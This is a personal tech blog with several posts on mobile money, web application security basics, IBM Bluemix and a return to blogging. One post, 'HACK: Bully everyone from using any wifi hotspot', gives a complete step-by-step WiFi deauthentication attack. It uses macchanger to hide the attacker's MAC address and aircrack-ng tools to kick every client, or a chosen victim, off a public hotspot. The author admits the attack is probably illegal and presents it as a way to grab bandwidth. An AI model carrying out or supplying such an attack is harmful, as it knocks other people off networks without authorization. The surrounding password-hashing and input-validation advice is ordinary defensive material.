Tuesday, June 9, 2015

The Advent of Mobile money

It amazes me how mobile money has taken over the payment ecosystem in developing countries. Statistics don't lie: most people have never had access to a bank account, but almost everyone who owns a phone has access to mobile money. This says a lot about the kind of innovation that should be coming out of these countries. Card payments are still struggling to gain ground, and the notion that cards are not safe still keeps people from using them for transactions. So what next?

Are cards the solution to our problems? No. But mobile money is.

Openness.

Most online transactions, say 99.99% of e-commerce, happen via credit/debit card payments. The reason is that standards have been developed that make these services extensible. Today I can wake up and decide I am going to start selling products or services globally, and still be able to do the integration in less than a minute. But if I were to do the same locally, I would have to go to a third party who is either an aggregator or just some bright guy who learned the tricks of processing mobile money.

So basically what I am trying to say is that the providers of mobile money, i.e. Mpesa, Airtel Money, Yu Cash and Orange Money, should develop open standards that allow anyone to integrate and conduct a seamless transaction. I don't know why it's taking them so long, and yet they have the power to implement such application programming interfaces (APIs). If they really have to compete and keep up with upcoming ventures, they must learn how to move. I know most people will dismiss my argument, but still, the mobile payments ecosystem is evolving. Soon, I mean very soon, we shall see bright minds coming up with integrations of mobile payments and cards. I will not talk much about it, but watch this space.

According to PWC, the mobile payments ecosystem will be worth $216 billion. Will you be part of this? And how? You can be part of the statistics simply by making payments, but that is not my concern. What is more important is whether you will be the one who facilitates the happenings behind the scenes. Will you create platforms to complement or compete with mobile money? I throw the ball in your court. The choice is in your hands: either you swim or you drown. Looks like you have no option anyway. You definitely will be part of the statistics.

Mobile money is already creating a storm. But it seems the owners aren't keen on facilitating major innovation by developing open APIs for developers to integrate with mobile money. I know there are many factors (like fraud detection, money laundering, etc.) to consider when it comes to this kind of development. But people have done it elsewhere; why not borrow the concept? We have some of the brightest techies around who can find a workaround for any of these challenges. So I am appealing to the providers to hasten their moves and make this platform available ASAP!

Imagine mobile money vs IoT. Food for thought! :-)

Monday, July 14, 2014

Web Application Security: A must read for developers

There are people who spend all their time trying to screw your web application. Many ninjas have suffered at the hands of the black hats. Luckily, I happen to be a white hat.
There are many aspects to consider in making your web application secure. The Open Web Application Security Project (OWASP) has compiled a comprehensive list of known security issues and methods to protect yourself against them.
Some of the basic precautions you can take include:

Password Hashing 

Almost everyone builds a web application that requires users to log in with a username and a password. The credentials are stored in the database and checked when a user logs in.
It is important that you properly hash passwords before storing them. A password hash is an irreversible, one-way function of the user's password: you can recompute the hash from a candidate password and compare it with the stored value, but you cannot recover the original password from the hash. "Properly" matters here. A fast general-purpose hash such as MD5 or SHA-1 is the wrong tool, because an attacker with a GPU can test billions of guesses per second against it; use a hash designed for passwords (bcrypt, scrypt or PBKDF2, which in PHP means password_hash() and password_verify()) with a unique random salt per user, so that two users with the same password get different hashes and precomputed tables are useless. If passwords are not hashed and your database is accessed by an unauthorized third party, all user accounts are compromised at once. Some users may (unfortunately) use the same password for other services. Therefore, it is important to take security seriously.
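As an added example (not code from the original post, which has PHP in mind), here is the same idea in Python using only the standard library: a random salt per password, the iteration count stored alongside the hash so it can be raised later without breaking old records, and a constant-time comparison on verification. The PBKDF2-SHA256 choice, the iteration count and the pbkdf2_sha256$iterations$salt$hash storage format are choices made for this example; unsalted_md5 is there only to show what not to do.

```python
import hashlib
import hmac
import os

# Work factor chosen for this example (an assumption, not from the post).
# Raise it as hardware gets faster; old records keep their own count.
ITERATIONS = 100000
SALT_BYTES = 16
KEY_LEN = 32


def hash_password(password: str) -> str:
    """Hash a password for storage.

    Returns a self-describing record, pbkdf2_sha256$iterations$salt_hex$hash_hex,
    so the parameters used can be recovered at verification time.
    """
    salt = os.urandom(SALT_BYTES)  # fresh random salt per password
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), salt, ITERATIONS, dklen=KEY_LEN)
    return "pbkdf2_sha256$%d$%s$%s" % (ITERATIONS, salt.hex(), digest.hex())


def verify_password(password: str, stored: str) -> bool:
    """Recompute the hash with the stored salt and iteration count and compare
    in constant time, so timing does not leak how many bytes matched."""
    try:
        scheme, iterations, salt_hex, hash_hex = stored.split("$")
        if scheme != "pbkdf2_sha256":
            return False
        salt = bytes.fromhex(salt_hex)
        expected = bytes.fromhex(hash_hex)
        candidate = hashlib.pbkdf2_hmac(
            "sha256", password.encode("utf-8"), salt, int(iterations),
            dklen=len(expected))
    except (ValueError, TypeError):
        return False  # malformed record: wrong field count, bad hex, bad count
    return hmac.compare_digest(candidate, expected)


def unsalted_md5(password: str) -> str:
    """What NOT to do: fast and unsalted, so equal passwords give equal hashes
    and precomputed tables or a GPU crack the whole table in bulk."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


if __name__ == "__main__":
    record = hash_password("correct horse battery staple")
    print(record)
    print(verify_password("correct horse battery staple", record))  # True
    print(verify_password("wrong", record))                         # False
```

Two things to notice when you run it: hashing the same password twice gives two different records (the salt differs), and a garbage record is simply rejected rather than raising, so a corrupted row cannot turn into a crash or a bypass.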

Sanitization

Sanitization is a way of ensuring that illegal or unsafe characters are removed from, or neutralised in, foreign input before it reaches a context that would interpret them.
For example, you should escape foreign input before including it in HTML, and you should never build a raw SQL query by concatenating it. When you use bound parameters with PDO, the value is sent to the database separately from the SQL text, so it is never parsed as SQL; that is not sanitization of the input, but it removes the need for it in that context.

Data Filtering

It is very bad for any app to accept foreign data without doing checks on it. So make sure you sanitize and validate foreign input before accepting it into your code.
While foreign data can be stored, combined, and accessed later, it is still foreign input. Every time you process, output, concatenate, or include data in your code, ask yourself whether the data is filtered properly and can be trusted. Data may be filtered differently based on its purpose: the same string needs different treatment when it goes into an SQL query, an HTML page or a shell command. For example, when unfiltered foreign input is passed into HTML page output, it can execute HTML and JavaScript on your site! This is known as Cross-Site Scripting (XSS) and can be a very dangerous attack. The reliable way to avoid XSS is to escape all user-generated data at the point where you output it to your page, turning characters with special meaning into their HTML entities with htmlspecialchars (with the ENT_QUOTES flag, so attribute values are covered too) or htmlentities. Removing HTML tags with strip_tags is a weaker defence and should not be relied on by itself: it does nothing for data placed inside an attribute value, and it loses the user's text.

Validation

Validation ensures that foreign input is what you expect, and rejects it otherwise rather than trying to repair it. For example, you may want to validate an email address, a phone number, or an age when processing a registration submission.
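The registration case as an added Python example, not code from the original post. The email and phone patterns, the age range and the error messages are choices made for this example (a real deployment would pick rules to match its own users); the point it shows is the allowlist approach, where each field must match a known-good shape in full and anything else, including a missing field, is an error rather than an exception.

```python
import re

# Patterns chosen for this example (assumptions, not from the post): a pragmatic
# email shape, and phone numbers as 9 to 15 digits with an optional leading +.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")
PHONE_RE = re.compile(r"\+?[0-9]{9,15}")
MIN_AGE, MAX_AGE = 13, 120


def validate_email(value: str) -> bool:
    # fullmatch, not search/match: trailing junk must fail, which also blocks
    # header-injection style input such as "a@b.com\r\nbcc: ..."
    return len(value) <= 254 and EMAIL_RE.fullmatch(value) is not None


def validate_phone(value: str) -> bool:
    digits = re.sub(r"[ \-().]", "", value)  # tolerate common formatting, then be strict
    return PHONE_RE.fullmatch(digits) is not None


def validate_age(value: str) -> bool:
    # str.isdigit rejects "", "-5", "3.5" and "12abc" before int() ever runs
    return value.isdigit() and MIN_AGE <= int(value) <= MAX_AGE


def validate_registration(form: dict) -> dict:
    """Return {field: error message}; an empty dict means the submission is
    acceptable. Fields are read with defaults so a missing field is reported
    like any other bad value instead of raising."""
    errors = {}
    if not validate_email(str(form.get("email", "")).strip()):
        errors["email"] = "invalid email address"
    if not validate_phone(str(form.get("phone", ""))):
        errors["phone"] = "invalid phone number"
    if not validate_age(str(form.get("age", "")).strip()):
        errors["age"] = "age must be a whole number between %d and %d" % (MIN_AGE, MAX_AGE)
    return errors


if __name__ == "__main__":
    # constructed submissions, not real user data
    print(validate_registration(
        {"email": "alice@example.com", "phone": "+254 700 000000", "age": "30"}))  # {}
    print(validate_registration(
        {"email": "not-an-email", "phone": "call me", "age": "-5"}))
```

Validation and escaping are different jobs: a value that passes validate_email still gets escaped when it is written into a page, because passing a shape check says nothing about the context it will be output into.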

Error Reporting

Error reporting can be useful in finding the problem spots in your application, but it can also expose information about the structure of your application (file paths, SQL fragments, library versions) to the outside world. To protect your application from the issues that such output could cause, you need to configure your server differently in development versus production (live): in production, turn display_errors off and log_errors on, so the details go to a log file that only you can read.

Configuration files

When creating configuration files for your applications, best practice recommends the following:
  • Store your configuration information outside the web root, where it cannot be requested directly by URL, and have the application read it via the file system.
  • Protect the information in configuration files accordingly, either through encryption or through group/user file system permissions, so that only the account the web server runs as can read it.

 

Friday, July 4, 2014

HACK: Bully everyone from using any wifi hotspot.

With this cold I cannot imagine someone giving me very hot coffee with slow Internet. I bet the consequences are unbearable.

Today in the morning I went to the coffee shop to get a cup before heading to the office. There were several shops, but the "free wifi" label attracted me. I decided to take out my computer to finish leeching some torrents. But the shock that fell on me was devastating and unbearable. You can imagine how a married man who codes and has kids looks when the kid pours coffee on the keyboard.
That's how I felt.
Anyway, I decided to throw everyone else off the network (it's illegal, I guess).

I will give you a step-by-step procedure on how you can do that. Script kiddies, you might be very unlucky though.

This attack is referred to as a de-authentication attack: the attacker sends forged 802.11 deauthentication frames, which clients and access points honour without any authentication, so the victims are dropped from the network and have to reconnect. I am not liable or responsible for anything you may do with this information.


Requirements:
1. Brewed coffee that can last the whole day, because you will enjoy the speeds when no one else is using the "free wifi".
2. A Linux machine.
3. macchanger (sudo apt-get install macchanger).
4. The aircrack-ng suite, which includes airmon-ng, airodump-ng and aireplay-ng (sudo apt-get install aircrack-ng).
5. A wifi card that can be put into monitor mode and inject frames.
Step 1: Check the card and set up monitor mode
First we need to check that your wifi card is recognised by your machine.
Open a terminal and run the following command:

sudo airmon-ng

The output lists each wireless interface with its chipset and driver; your card should appear there.

Next we create our monitor interface, after first changing the card's MAC address so the attack is not tied to our real hardware address. Replace wlan0 with the name of your interface (mine is wlan0). The order matters: macchanger needs the interface down, and airmon-ng start creates a separate monitor interface (mon0 on older versions, wlan0mon on newer ones), which is the name you use in the next step.

sudo airmon-ng stop mon0                        # only if a monitor interface from an earlier run exists
sudo airmon-ng check kill                       # stop NetworkManager/wpa_supplicant, which would otherwise interfere
sudo ifconfig wlan0 down
sudo macchanger --mac 00:11:22:33:44:55 wlan0   # or macchanger -r wlan0 for a random address
sudo ifconfig wlan0 up
sudo airmon-ng start wlan0
Step 2: Run the attack
Now it's time for action. First we need the MAC address (BSSID) and channel of the hotspot we want to attack. airodump-ng lists every access point the card can hear, along with the clients attached to each one:

sudo airodump-ng mon0

Note the BSSID and channel of the hotspot, stop airodump-ng with ctrl-c, and lock the monitor interface to that channel so the deauthentication frames actually reach it. Then run aireplay-ng in deauthentication mode (-0); a count of 0 means keep sending until you stop it. Replace bssid with the hotspot's BSSID.

sudo iwconfig mon0 channel 6       # use the channel airodump-ng showed for the hotspot
sudo aireplay-ng -0 0 -a bssid mon0

To stop the process use ctrl-c, but only do this when you can no longer take more coffee. Without -c the deauthentication frames are broadcast, so every client of that access point is kicked off, repeatedly.
Just in case you want to kick a single hater off the network, add the client's MAC address (shown by airodump-ng under the access point) with -c:

sudo aireplay-ng -0 0 -a bssid -c victimmac mon0

I think we are done; now you can enjoy fast internet without bothering about the others.
Wifi admins, I am so sorry, but on most access points there is nothing you can do to prevent this: deauthentication frames are unauthenticated management frames, so anyone who can forge them can kick anyone off. The only real fix is 802.11w (Protected Management Frames), which authenticates those frames, and it needs support on both the access point and every client. Just holler at me for help. :-(

Thursday, July 3, 2014

IT'S GOOD TO BE BACK.

It's been a really long time since I started contemplating writing this blog. Laziness crawled my way, and I have been in a serious war to ensure everything is back to normal. I am not sure if it is back. But anyway, I want to share a few lessons I learnt while I was away.

This will also serve as a guide to the next articles I will be publishing.
So #whileiwasaway:
  • I learnt Java in a night. But with a few grams of coffee and some watts.
  • I was scared when I was asked about linked lists and arrays. You have to be, because it's something you use daily but can't really define.
  • Went for a rally and just tried to imagine the future of machine intelligence.
  • I fell in love. It showed me logic doesn't apply everywhere.
Too many stories won't help us. But in the next few days I will try to focus on dissecting some of the lessons above and how we can use them to solve problems in the real world.

But today I just want to leave you with some questions.

Recently we have witnessed the growth of mobile money. What do you think is its future, and does other electronic money, i.e. Bitcoin, pose a threat to it?

If you delete My Computer, will your computer disappear?


Wednesday, May 21, 2014

Codename:Bluemix My new Love.

It couldn't be simpler to deploy my application to the cloud in just a few seconds. It's not only exciting but tremendous.
Codename:Bluemix is an implementation of IBM's Open Cloud Architecture, based on Cloud Foundry (the open source Platform-as-a-Service software), that enables developers to rapidly build, deploy, and manage their cloud applications while enjoying a choice of services, runtimes and frameworks.
IBM provides services and runtimes into the ecosystem based on its extensive software portfolio.
The product is at the beta stage and is currently available for developers to test free of charge, as in "free as in beer".
Being an enthusiast of the new product, I have been exploring some of its main goals, and they happen to be brief and understandable. They say that Bluemix will be able to:

  1. Reduce time for application/infrastructure provisioning.
  2. Allow for flexible capacity.
  3. Help to address any lack of internal tech resources.
  4. Reduce Total Cost of Ownership (TCO)
  5. Accelerate exploration of new workloads – social, mobile, big data.
This is the look and feel of the Dashboard.

For all developers out there interested in signing up for the beta, use this link: https://ace.ng.bluemix.net/
I will take you step by step through the process of uploading your PHP application to Bluemix.
Some of the other capabilities Bluemix has include Java, mobile backend development and application monitoring, as well as capabilities from ecosystem partners and open source, all through an as-a-service model in the cloud.